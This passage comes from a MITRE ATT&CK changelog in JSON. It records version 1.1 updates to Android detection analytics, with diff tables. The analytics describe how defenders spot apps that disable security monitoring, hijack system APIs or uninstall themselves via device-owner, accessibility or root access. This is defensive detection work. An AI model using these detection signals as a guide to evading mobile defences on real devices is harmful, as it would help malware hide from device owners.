                            "channel": "change to security-relevant device configuration or managed policy (e.g., accessibility enablement, app admin changes, security service state change) preceding telemetry degradation"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "ecurity or monitoring application transitions to disabled, inactive, or non-reporting state while other applications remain active"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "application invokes system framework operations that alter monitoring, accessibility, or execution visibility followed by reduction in expected telemetry generation"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between configuration change, telemetry degradation, and subsequent activity"
                        },
                        {
                            "field": "ExpectedTelemetrySources",
                            "description": "Baseline set of telemetry sources expected to report continuously (EDR, sensor feeds, monitoring services)"
                        },
                        {
                            "field": "TelemetryGapThreshold",
                            "description": "Duration or volume threshold defining abnormal loss of telemetry"
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Applications legitimately capable of modifying device configuration or security posture"
                        },
                        {
                            "field": "CriticalControlSet",
                            "description": "Set of security-relevant controls considered high-impact if altered (EDR, accessibility, admin APIs)"
                        },
                        {
                            "field": "UplinkBytesThreshold",
                            "description": "Outbound traffic threshold used to confirm continued activity during telemetry loss"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between configuration change, telemetry degradation, and subsequent activity\"}, {\"field\": \"ExpectedTelemetrySources\", \"description\": \"Baseline set of telemetry sources expected to report continuously (EDR, sensor feeds, monitoring services)\"}, {\"field\": \"TelemetryGapThreshold\", \"description\": \"Duration or volume threshold defining abnormal loss of telemetry\"}, {\"field\": \"AllowedAppList\", \"description\": \"Applications legitimately capable of modifying device configuration or security posture\"}, {\"field\": \"CriticalControlSet\", \"description\": \"Set of security-relevant controls considered high-impact if altered (EDR, accessibility, admin APIs)\"}, {\"field\": \"UplinkBytesThreshold\", \"description\": \"Outbound traffic threshold used to confirm continued activity during telemetry loss\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-24 20:30:37.215000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Correlates (1) application-driven modification of device security posture or monitoring capability (e.g., accessibility abuse, disabling security app components, altering monitoring configuration), (2) immediate degradation or cessation of expected telemetry sources such as mobile EDR, sensor visibility, or system monitoring, and (3) subsequent application activity continuing with reduced observability. The defender observes a causal chain where defensive visibility or enforcement is altered first, followed by continued execution under reduced monitoring conditions.\", \"old_value\": \"Application vetting can detect many techniques associated with impairing device defenses.(Citation: Samsung Knox Mobile Threat Defense)\\nMobile security products integrated with Samsung Knox for Mobile Threat Defense can monitor processes to see if security tools are killed or stop running.\", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1 @@\\n-Application vetting can detect many techniques associated with impairing device defenses.(Citation: Samsung Knox Mobile Threat Defense)\\n-Mobile security products integrated with Samsung Knox for Mobile Threat Defense can monitor processes to see if security tools are killed or stop running.\\n+Correlates (1) application-driven modification of device security posture or monitoring capability (e.g., accessibility abuse, disabling security app components, altering monitoring configuration), (2) immediate degradation or cessation of expected telemetry sources such as mobile EDR, sensor visibility, or system monitoring, and (3) subsequent application activity continuing with reduced observability. The defender observes a causal chain where defensive visibility or enforcement is altered first, followed by continued execution under reduced monitoring conditions.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"change to security-relevant device configuration or managed policy (e.g., accessibility enablement, app admin changes, security service state change) preceding telemetry degradation\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"ecurity or monitoring application transitions to disabled, inactive, or non-reporting state while other applications remain active\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f\", \"name\": \"Process\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"application invokes system framework operations that alter monitoring, accessibility, or execution visibility followed by reduction in expected telemetry generation\"}}, \"iterable_item_removed\": {\"root['external_references'][1]\": {\"source_name\": \"Samsung Knox Mobile Threat Defense\", \"description\": \"Samsung Knox Partner Program. (n.d.). Knox for Mobile Threat Defense. Retrieved March 30, 2022.\", \"url\": \"https://partner.samsungknox.com/mtd\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to176__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to176__0\"><a href=\"#difflib_chg_to176__top\">t</a></td><td class=\"diff_header\" id=\"from176_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Application&nbsp;vetting&nbsp;can&nbsp;detect&nbsp;many&nbsp;techniques&nbsp;associated&nbsp;wi</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to176__top\">t</a></td><td class=\"diff_header\" id=\"to176_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Correlates&nbsp;(1)&nbsp;application-driven&nbsp;modification&nbsp;of&nbsp;device&nbsp;sec</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">th&nbsp;impairing&nbsp;device&nbsp;defenses.(Citation:&nbsp;Samsung&nbsp;Knox&nbsp;Mobile&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">urity&nbsp;posture&nbsp;or&nbsp;monitoring&nbsp;capability&nbsp;(e.g.,&nbsp;accessibility&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Threat&nbsp;Defense)&nbsp;Mobile&nbsp;security&nbsp;products&nbsp;integrated&nbsp;with&nbsp;Sam</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">abuse,&nbsp;disabling&nbsp;security&nbsp;app&nbsp;components,&nbsp;altering&nbsp;monitorin</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">sung&nbsp;Knox&nbsp;for&nbsp;Mobile&nbsp;Threat&nbsp;Defense&nbsp;can&nbsp;monitor&nbsp;processes&nbsp;to</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">g&nbsp;configuration),&nbsp;(2)&nbsp;immediate&nbsp;degradation&nbsp;or&nbsp;cessation&nbsp;of&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;see&nbsp;if&nbsp;security&nbsp;tools&nbsp;are&nbsp;killed&nbsp;or&nbsp;stop&nbsp;running.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">expected&nbsp;telemetry&nbsp;sources&nbsp;such&nbsp;as&nbsp;mobile&nbsp;EDR,&nbsp;sensor&nbsp;visibi</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">lity,&nbsp;or&nbsp;system&nbsp;monitoring,&nbsp;and&nbsp;(3)&nbsp;subsequent&nbsp;application&nbsp;a</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ctivity&nbsp;continuing&nbsp;with&nbsp;reduced&nbsp;observability.&nbsp;The&nbsp;defender&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">observes&nbsp;a&nbsp;causal&nbsp;chain&nbsp;where&nbsp;defensive&nbsp;visibility&nbsp;or&nbsp;enforc</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ement&nbsp;is&nbsp;altered&nbsp;first,&nbsp;followed&nbsp;by&nbsp;continued&nbsp;execution&nbsp;unde</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">r&nbsp;reduced&nbsp;monitoring&nbsp;conditions.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--90052e39-40c3-4194-a2a2-fc240639ab0f",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-13 18:04:23.913000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0689#AN1800",
                            "external_id": "AN1800"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1800",
                    "description": "Correlates (1) modification or replacement of system runtime libraries or API resolution paths, (2) repeated invocation of hijacked APIs across multiple applications, and (3) inconsistent or suppressed outputs from those APIs compared to expected OS-enforced behavior. The defender observes a causal chain where system-level API behavior is altered, resulting in multiple applications exhibiting consistent anomalies in sensor access, permission checks, or system state reporting.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "multiple applications invoking core system APIs (e.g., sensor, permission, telephony) with abnormal or inconsistent return values across apps within short interval"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "device integrity degradation + root detected or system partition modification affecting runtime libraries (e.g., /system/lib*, /vendor/lib*)"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window across multiple applications invoking affected APIs"
                        },
                        {
                            "field": "SensitiveAPISet",
                            "description": "Set of APIs monitored for integrity (e.g., location, telephony, permission checks)"
                        },
                        {
                            "field": "CrossAppConsistencyThreshold",
                            "description": "Number of applications required to exhibit anomalous API behavior to trigger detection"
                        },
                        {
                            "field": "ExpectedAPIBaseline",
                            "description": "Baseline of expected API return values or behavior patterns per device state"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window across multiple applications invoking affected APIs\"}, {\"field\": \"SensitiveAPISet\", \"description\": \"Set of APIs monitored for integrity (e.g., location, telephony, permission checks)\"}, {\"field\": \"CrossAppConsistencyThreshold\", \"description\": \"Number of applications required to exhibit anomalous API behavior to trigger detection\"}, {\"field\": \"ExpectedAPIBaseline\", \"description\": \"Baseline of expected API return values or behavior patterns per device state\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-13 18:04:23.913000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Correlates (1) modification or replacement of system runtime libraries or API resolution paths, (2) repeated invocation of hijacked APIs across multiple applications, and (3) inconsistent or suppressed outputs from those APIs compared to expected OS-enforced behavior. The defender observes a causal chain where system-level API behavior is altered, resulting in multiple applications exhibiting consistent anomalies in sensor access, permission checks, or system state reporting.\", \"old_value\": \"Mobile threat defense agents could detect unauthorized operating system modifications by using attestation. \"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"multiple applications invoking core system APIs (e.g., sensor, permission, telephony) with abnormal or inconsistent return values across apps within short interval\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6\", \"name\": \"Sensor Health\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"device integrity degradation + root detected or system partition modification affecting runtime libraries (e.g., /system/lib*, /vendor/lib*)\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to87__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to87__0\"><a href=\"#difflib_chg_to87__top\">t</a></td><td class=\"diff_header\" id=\"from87_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Mobile&nbsp;threat&nbsp;defense&nbsp;agents&nbsp;could&nbsp;detect&nbsp;unauthorized&nbsp;opera</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to87__top\">t</a></td><td class=\"diff_header\" id=\"to87_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Correlates&nbsp;(1)&nbsp;modification&nbsp;or&nbsp;replacement&nbsp;of&nbsp;system&nbsp;runtime</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ting&nbsp;system&nbsp;modifications&nbsp;by&nbsp;using&nbsp;attestation.&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;libraries&nbsp;or&nbsp;API&nbsp;resolution&nbsp;paths,&nbsp;(2)&nbsp;repeated&nbsp;invocation&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">of&nbsp;hijacked&nbsp;APIs&nbsp;across&nbsp;multiple&nbsp;applications,&nbsp;and&nbsp;(3)&nbsp;incon</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">sistent&nbsp;or&nbsp;suppressed&nbsp;outputs&nbsp;from&nbsp;those&nbsp;APIs&nbsp;compared&nbsp;to&nbsp;ex</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">pected&nbsp;OS-enforced&nbsp;behavior.&nbsp;The&nbsp;defender&nbsp;observes&nbsp;a&nbsp;causal&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">chain&nbsp;where&nbsp;system-level&nbsp;API&nbsp;behavior&nbsp;is&nbsp;altered,&nbsp;resulting&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">in&nbsp;multiple&nbsp;applications&nbsp;exhibiting&nbsp;consistent&nbsp;anomalies&nbsp;in&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">sensor&nbsp;access,&nbsp;permission&nbsp;checks,&nbsp;or&nbsp;system&nbsp;state&nbsp;reporting.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--176d2eda-e41b-48d0-b66a-daaccb5a77cd",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-24 20:30:17.842000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0690#AN1801",
                            "external_id": "AN1801"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1801",
                    "description": "Correlates (1) a malicious application gaining or using a removal-capable control path, such as device owner or delegated app-management authority, accessibility service control over uninstall UI, or rooted filesystem access, (2) initiation of uninstall or package-removal behavior, and (3) disappearance of the application from installed-state inventory or app runtime immediately afterward, often with a short-lived final burst of local cleanup or outbound communication. The defender observes a causal chain where the application first establishes the ability to remove itself, then triggers uninstall or deletion, and then vanishes from expected app presence while device activity continues.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "application holds device-owner, profile-owner, or delegated app-management authority capable of package removal before uninstall event"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "application has accessibility service privileges immediately before package-removal UI flow and subsequent application disappearance"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "device posture indicates rooted, compromised, or non-compliant state before package files disappear without standard managed uninstall workflow"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "application invokes uninstall-related package-management operations, accessibility-driven uninstall confirmation actions, or privileged file-removal operations immediately before installed-state loss"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--e905dad2-00d6-477c-97e8-800427abd0e8",
                            "name": "MobileEDR:telemetry",
                            "channel": "application deletes package files, cleanup artifacts, or app-local state immediately before disappearance from installed inventory or runtime"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between uninstall-capable control, removal action, and app disappearance"
                        },
                        {
                            "field": "RemovalAuthoritySet",
                            "description": "Roles or privileges considered capable of enabling silent or assisted uninstall, such as device owner, delegated app-management authority, accessibility, or rooted filesystem access"
                        },
                        {
                            "field": "AllowedRemovalApps",
                            "description": "Legitimate enterprise or device-management apps allowed to uninstall applications"
                        },
                        {
                            "field": "RemovalAttemptSignalSet",
                            "description": "Signals used to recognize uninstall initiation, such as package-removal actions, uninstall intent flows, or accessibility-driven confirmation steps"
                        },
                        {
                            "field": "DisappearanceThreshold",
                            "description": "Maximum time between removal action and loss of installed-state visibility"
                        },
                        {
                            "field": "UplinkBytesThreshold",
                            "description": "Outbound traffic threshold used to confirm final activity before self-removal"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between uninstall-capable control, removal action, and app disappearance\"}, {\"field\": \"RemovalAuthoritySet\", \"description\": \"Roles or privileges considered capable of enabling silent or assisted uninstall, such as device owner, delegated app-management authority, accessibility, or rooted filesystem access\"}, {\"field\": \"AllowedRemovalApps\", \"description\": \"Legitimate enterprise or device-management apps allowed to uninstall applications\"}, {\"field\": \"RemovalAttemptSignalSet\", \"description\": \"Signals used to recognize uninstall initiation, such as package-removal actions, uninstall intent flows, or accessibility-driven confirmation steps\"}, {\"field\": \"DisappearanceThreshold\", \"description\": \"Maximum time between removal action and loss of installed-state visibility\"}, {\"field\": \"UplinkBytesThreshold\", \"description\": \"Outbound traffic threshold used to confirm final activity before self-removal\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-24 20:30:17.842000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Correlates (1) a malicious application gaining or using a removal-capable control path, such as device owner or delegated app-management authority, accessibility service control over uninstall UI, or rooted filesystem access, (2) initiation of uninstall or package-removal behavior, and (3) disappearance of the application from installed-state inventory or app runtime immediately afterward, often with a short-lived final burst of local cleanup or outbound communication. The defender observes a causal chain where the application first establishes the ability to remove itself, then triggers uninstall or deletion, and then vanishes from expected app presence while device activity continues.\", \"old_value\": \"Application vetting services could look for use of the accessibility service or features that typically require root access.\\nThe user can see a list of applications that can use accessibility services in the device settings.\", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1 @@\\n-Application vetting services could look for use of the accessibility service or features that typically require root access.\\n-The user can see a list of applications that can use accessibility services in the device settings.\\n+Correlates (1) a malicious application gaining or using a removal-capable control path, such as device owner or delegated app-management authority, accessibility service control over uninstall UI, or rooted filesystem access, (2) initiation of uninstall or package-removal behavior, and (3) disappearance of the application from installed-state inventory or app runtime immediately afterward, often with a short-lived final burst of local cleanup or outbound communication. The defender observes a causal chain where the application first establishes the ability to remove itself, then triggers uninstall or deletion, and then vanishes from expected app presence while device activity continues.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"application holds device-owner, profile-owner, or delegated app-management authority capable of package removal before uninstall event\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"application has accessibility service privileges immediately before package-removal UI flow and subsequent application disappearance\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"User Interface\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"device posture indicates rooted, compromised, or non-compliant state before package files disappear without standard managed uninstall workflow\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"application invokes uninstall-related package-management operations, accessibility-driven uninstall confirmation actions, or privileged file-removal operations immediately before installed-state loss\"}, \"root['x_mitre_log_source_references'][4]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--e905dad2-00d6-477c-97e8-800427abd0e8\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"application deletes package files, cleanup artifacts, or app-local state immediately before disappearance from installed inventory or runtime\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to160__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to160__0\"><a href=\"#difflib_chg_to160__top\">t</a></td><td class=\"diff_header\" id=\"from160_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Application&nbsp;vetting&nbsp;services&nbsp;could&nbsp;look&nbsp;for&nbsp;use&nbsp;of&nbsp;the&nbsp;acces</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to160__top\">t</a></td><td class=\"diff_header\" id=\"to160_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Correlates&nbsp;(1)&nbsp;a&nbsp;malicious&nbsp;application&nbsp;gaining&nbsp;or&nbsp;using&nbsp;a&nbsp;re</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">sibility&nbsp;service&nbsp;or&nbsp;features&nbsp;that&nbsp;typically&nbsp;require&nbsp;root&nbsp;acc</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">moval-capable&nbsp;control&nbsp;path,&nbsp;such&nbsp;as&nbsp;device&nbsp;owner&nbsp;or&nbsp;delegate</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ess.&nbsp;The&nbsp;user&nbsp;can&nbsp;see&nbsp;a&nbsp;list&nbsp;of&nbsp;applications&nbsp;that&nbsp;can&nbsp;use&nbsp;ac</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">d&nbsp;app-management&nbsp;authority,&nbsp;accessibility&nbsp;service&nbsp;control&nbsp;ov</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">cessibility&nbsp;services&nbsp;in&nbsp;the&nbsp;device&nbsp;settings.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">er&nbsp;uninstall&nbsp;UI,&nbsp;or&nbsp;rooted&nbsp;filesystem&nbsp;access,&nbsp;(2)&nbsp;initiation</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span 